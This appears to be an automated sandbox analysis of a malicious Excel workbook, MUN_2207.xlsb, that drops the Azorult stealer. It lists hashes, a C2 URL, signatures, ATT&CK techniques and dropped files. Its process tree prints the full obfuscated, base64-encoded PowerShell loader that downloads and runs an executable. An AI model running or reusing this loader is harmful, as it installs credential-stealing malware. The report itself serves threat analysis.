Analysis

  • max time kernel
    104s
  • max time network
    145s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    22-07-2021 09:42

General

  • Target

    MUN_2207.xlsb

  • Size

    38KB

  • MD5

    302b089cdad737572251ed036c828168

  • SHA1

    a22de587007bf85f3998b4cdde2e794409ea0c0b

  • SHA256

    b4f58a5e9cc1c3b94f848aeb3830e9e28a38ec98cc6ec3337661d7b17c08e358

  • SHA512

    d52c79b2040d4028a31ca83304a23650e095c5efda67c6e3f0039d0b5bf9c9120825f4d4e89cad2290f582f6f294de3dfd003a0a91ec3eb6b85610dbfceedf25

Malware Config

Extracted

Family

azorult

C2

http://itthonfiatalon.hu/temp/reo/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Loads dropped DLL 4 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\MUN_2207.xlsb"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1808
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C P^oW^eR^S^hE^Ll -E WwBzAHkAcwB0AEUAbQAuAFQAZQB4AFQALgBlAG4AYwBvAGQAaQBuAEcAXQA6ADoAdQBOAEkAYwBvAGQARQAuAGcAZQB0AHMAdABSAGkAbgBnACgAWwBzAHkAUwBUAEUATQAuAEMAbwBOAFYAZQByAFQAXQA6ADoAZgBSAG8AbQBCAEEAcwBFADYANABzAHQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEASABNAEEAYwBBAEIAeABBAEgAUQBBAEkAQQBBAG8AQQBDAEEAQQBKAEEAQgBtAEEASABvAEEAYwBnAEIAMABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBaAFEAQgAzAEEARwBrAEEAYQBBAEEAZwBBAEMAawBBAEkAQQBCADcAQQBFAGsAQQBiAFEAQgBRAEEARQA4AEEAVQBnAEIAMABBAEMAMABBAFQAUQBCAFAAQQBFAFEAQQBkAFEAQgBNAEEARwBVAEEASQBBAEIAaQBBAEcAawBBAGQAQQBCAFQAQQBIAFEAQQBjAGcAQgBoAEEARQA0AEEAYwB3AEIARwBBAEUAVQBBAFUAZwBBADcAQQBBADAAQQBDAGcAQgBUAEEASABRAEEAWQBRAEIAUwBBAEgAUQBBAEwAUQBCAGkAQQBFAGsAQQBkAEEAQgB6AEEASABRAEEAVQBnAEIAQgBBAEUANABBAFUAdwBCAG0AQQBFAFUAQQBjAGcAQQBnAEEAQwAwAEEAVQB3AEIAUABBAEYAVQBBAGMAZwBCAEQAQQBFAFUAQQBJAEEAQQBrAEEARwBZAEEAZQBnAEIAeQBBAEgAUQBBAEkAQQBBAHQAQQBFAFEAQQBSAFEAQgBUAEEARgBRAEEAUwBRAEIAdQBBAEUARQBBAFYAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEAQwBRAEEAWgBRAEIAMwBBAEcAawBBAGEAQQBBADcAQQBDAEEAQQBTAFEAQgB1AEEASABZAEEAYgB3AEIAcgBBAEcAVQBBAEwAUQBCAEoAQQBIAFEAQQBaAFEAQgB0AEEAQwBBAEEASgBBAEIAbABBAEgAYwBBAGEAUQBCAG8AQQBEAHMAQQBmAFEAQQBOAEEAQQBvAEEAZABBAEIAeQBBAEgAawBBAGUAdwBBAGcAQQBDAEEAQQBKAEEAQgB4AEEARwBvAEEAYgBBAEIAcABBAEgAZwBBAGQAQQBCAHAAQQBHAEkAQQBjAHcAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEgAWQBBAE8AZwBCAFUAQQBFAFUAQQBUAFEAQgBRAEEAQwBzAEEASgB3AEIAYwBBAEcAcwBBAGIAQQBCAHcAQQBHAFkAQQBhAGcAQgBuAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgB6AEEASABBAEEAYwBRAEIAMABBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEcATQBBAFkAUQBCAHoAQQBHAFUAQQBaAGcAQgB5AEEARwBFAEEAYgBnAEIAcgBBAEMANABBAFkAdwBCAHYAQQBHADAAQQBMAHcAQgAwAEEARwBVAEEAYgBRAEIAdwBBAEMAOABBAFoAUQBCAG4AQQBHAFEAQQBaAHcAQgBvAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBjAFEAQgBxAEEARwB3AEEAYQBRAEIANABBAEgAUQBBAGEAUQBCAGkAQQBIAE0AQQBPAHcAQQBOAEEAQQBvAEEASQBBAEIAOQBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEAIgApACkAfABpAEUAeAA=
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2116
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PoWeRShELl -E WwBzAHkAcwB0AEUAbQAuAFQAZQB4AFQALgBlAG4AYwBvAGQAaQBuAEcAXQA6ADoAdQBOAEkAYwBvAGQARQAuAGcAZQB0AHMAdABSAGkAbgBnACgAWwBzAHkAUwBUAEUATQAuAEMAbwBOAFYAZQByAFQAXQA6ADoAZgBSAG8AbQBCAEEAcwBFADYANABzAHQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEASABNAEEAYwBBAEIAeABBAEgAUQBBAEkAQQBBAG8AQQBDAEEAQQBKAEEAQgBtAEEASABvAEEAYwBnAEIAMABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBaAFEAQgAzAEEARwBrAEEAYQBBAEEAZwBBAEMAawBBAEkAQQBCADcAQQBFAGsAQQBiAFEAQgBRAEEARQA4AEEAVQBnAEIAMABBAEMAMABBAFQAUQBCAFAAQQBFAFEAQQBkAFEAQgBNAEEARwBVAEEASQBBAEIAaQBBAEcAawBBAGQAQQBCAFQAQQBIAFEAQQBjAGcAQgBoAEEARQA0AEEAYwB3AEIARwBBAEUAVQBBAFUAZwBBADcAQQBBADAAQQBDAGcAQgBUAEEASABRAEEAWQBRAEIAUwBBAEgAUQBBAEwAUQBCAGkAQQBFAGsAQQBkAEEAQgB6AEEASABRAEEAVQBnAEIAQgBBAEUANABBAFUAdwBCAG0AQQBFAFUAQQBjAGcAQQBnAEEAQwAwAEEAVQB3AEIAUABBAEYAVQBBAGMAZwBCAEQAQQBFAFUAQQBJAEEAQQBrAEEARwBZAEEAZQBnAEIAeQBBAEgAUQBBAEkAQQBBAHQAQQBFAFEAQQBSAFEAQgBUAEEARgBRAEEAUwBRAEIAdQBBAEUARQBBAFYAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEAQwBRAEEAWgBRAEIAMwBBAEcAawBBAGEAQQBBADcAQQBDAEEAQQBTAFEAQgB1AEEASABZAEEAYgB3AEIAcgBBAEcAVQBBAEwAUQBCAEoAQQBIAFEAQQBaAFEAQgB0AEEAQwBBAEEASgBBAEIAbABBAEgAYwBBAGEAUQBCAG8AQQBEAHMAQQBmAFEAQQBOAEEAQQBvAEEAZABBAEIAeQBBAEgAawBBAGUAdwBBAGcAQQBDAEEAQQBKAEEAQgB4AEEARwBvAEEAYgBBAEIAcABBAEgAZwBBAGQAQQBCAHAAQQBHAEkAQQBjAHcAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEgAWQBBAE8AZwBCAFUAQQBFAFUAQQBUAFEAQgBRAEEAQwBzAEEASgB3AEIAYwBBAEcAcwBBAGIAQQBCAHcAQQBHAFkAQQBhAGcAQgBuAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgB6AEEASABBAEEAYwBRAEIAMABBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEcATQBBAFkAUQBCAHoAQQBHAFUAQQBaAGcAQgB5AEEARwBFAEEAYgBnAEIAcgBBAEMANABBAFkAdwBCAHYAQQBHADAAQQBMAHcAQgAwAEEARwBVAEEAYgBRAEIAdwBBAEMAOABBAFoAUQBCAG4AQQBHAFEAQQBaAHcAQgBvAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBjAFEAQgBxAEEARwB3AEEAYQBRAEIANABBAEgAUQBBAGEAUQBCAGkAQQBIAE0AQQBPAHcAQQBOAEEAQQBvAEEASQBBAEIAOQBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEAIgApACkAfABpAEUAeAA=
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2416
        • C:\Users\Admin\AppData\Local\Temp\klpfjg.exe
          "C:\Users\Admin\AppData\Local\Temp\klpfjg.exe"
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:2284
          • C:\Users\Admin\AppData\Local\Temp\klpfjg.exe
            "C:\Users\Admin\AppData\Local\Temp\klpfjg.exe"
            5⤵
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:2288

Network

MITRE ATT&CK Matrix ATT&CK v6

Credential Access

Credentials in Files

2
T1081

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Collection

Data from Local System

2
T1005

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\2fda\mozglue.dll
    MD5

    9e682f1eb98a9d41468fc3e50f907635

    SHA1

    85e0ceca36f657ddf6547aa0744f0855a27527ee

    SHA256

    830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d

    SHA512

    230230722d61ac1089fabf3f2decfa04f9296498f8e2a2a49b1527797dca67b5a11ab8656f04087acadf873fa8976400d57c77c404eba4aff89d92b9986f32ed

  • \Users\Admin\AppData\Local\Temp\2fda\msvcp140.dll
    MD5

    109f0f02fd37c84bfc7508d4227d7ed5

    SHA1

    ef7420141bb15ac334d3964082361a460bfdb975

    SHA256

    334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

    SHA512

    46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

  • \Users\Admin\AppData\Local\Temp\2fda\nss3.dll
    MD5

    556ea09421a0f74d31c4c0a89a70dc23

    SHA1

    f739ba9b548ee64b13eb434a3130406d23f836e3

    SHA256

    f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb

    SHA512

    2481fc80dffa8922569552c3c3ebaef8d0341b80427447a14b291ec39ea62ab9c05a75e85eef5ea7f857488cab1463c18586f9b076e2958c5a314e459045ede2

  • \Users\Admin\AppData\Local\Temp\2fda\vcruntime140.dll
    MD5

    7587bf9cb4147022cd5681b015183046

    SHA1

    f2106306a8f6f0da5afb7fc765cfa0757ad5a628

    SHA256

    c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

    SHA512

    0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

  • memory/1808-123-0x00000254ABD20000-0x00000254ADC15000-memory.dmp
    Filesize

    31.0MB

  • memory/1808-116-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp
    Filesize

    64KB

  • memory/1808-122-0x00007FF96F6D0000-0x00007FF9707BE000-memory.dmp
    Filesize

    16.9MB

  • memory/1808-114-0x00007FF690CF0000-0x00007FF6942A6000-memory.dmp
    Filesize

    53.7MB

  • memory/1808-115-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp
    Filesize

    64KB

  • memory/1808-449-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp
    Filesize

    64KB

  • memory/1808-448-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp
    Filesize

    64KB

  • memory/1808-447-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp
    Filesize

    64KB

  • memory/1808-446-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp
    Filesize

    64KB

  • memory/1808-118-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp
    Filesize

    64KB

  • memory/1808-117-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp
    Filesize

    64KB

  • memory/1808-119-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp
    Filesize

    64KB

  • memory/2116-262-0x0000000000000000-mapping.dmp
  • memory/2284-419-0x0000000008970000-0x0000000008992000-memory.dmp
    Filesize

    136KB

  • memory/2284-407-0x0000000000000000-mapping.dmp
  • memory/2284-409-0x0000000000540000-0x0000000000541000-memory.dmp
    Filesize

    4KB

  • memory/2284-411-0x0000000004EE0000-0x0000000004EE1000-memory.dmp
    Filesize

    4KB

  • memory/2284-412-0x0000000005480000-0x0000000005481000-memory.dmp
    Filesize

    4KB

  • memory/2284-413-0x0000000004F80000-0x0000000004F81000-memory.dmp
    Filesize

    4KB

  • memory/2284-414-0x0000000005040000-0x0000000005041000-memory.dmp
    Filesize

    4KB

  • memory/2284-415-0x00000000050E0000-0x00000000050E1000-memory.dmp
    Filesize

    4KB

  • memory/2284-416-0x0000000004F80000-0x000000000547E000-memory.dmp
    Filesize

    5.0MB

  • memory/2284-417-0x00000000051D0000-0x00000000051EB000-memory.dmp
    Filesize

    108KB

  • memory/2284-418-0x00000000088D0000-0x0000000008938000-memory.dmp
    Filesize

    416KB

  • memory/2288-421-0x000000000041A1F8-mapping.dmp
  • memory/2288-420-0x0000000000400000-0x0000000000420000-memory.dmp
    Filesize

    128KB

  • memory/2288-422-0x0000000000400000-0x0000000000420000-memory.dmp
    Filesize

    128KB

  • memory/2416-401-0x0000027510C46000-0x0000027510C48000-memory.dmp
    Filesize

    8KB

  • memory/2416-402-0x0000027510C48000-0x0000027510C49000-memory.dmp
    Filesize

    4KB

  • memory/2416-393-0x0000027529530000-0x0000027529531000-memory.dmp
    Filesize

    4KB

  • memory/2416-354-0x0000027529440000-0x0000027529441000-memory.dmp
    Filesize

    4KB

  • memory/2416-287-0x0000027510C43000-0x0000027510C45000-memory.dmp
    Filesize

    8KB

  • memory/2416-286-0x0000027510C40000-0x0000027510C42000-memory.dmp
    Filesize

    8KB

  • memory/2416-281-0x0000027529490000-0x0000027529491000-memory.dmp
    Filesize

    4KB

  • memory/2416-278-0x00000275292E0000-0x00000275292E1000-memory.dmp
    Filesize

    4KB

  • memory/2416-269-0x0000000000000000-mapping.dmp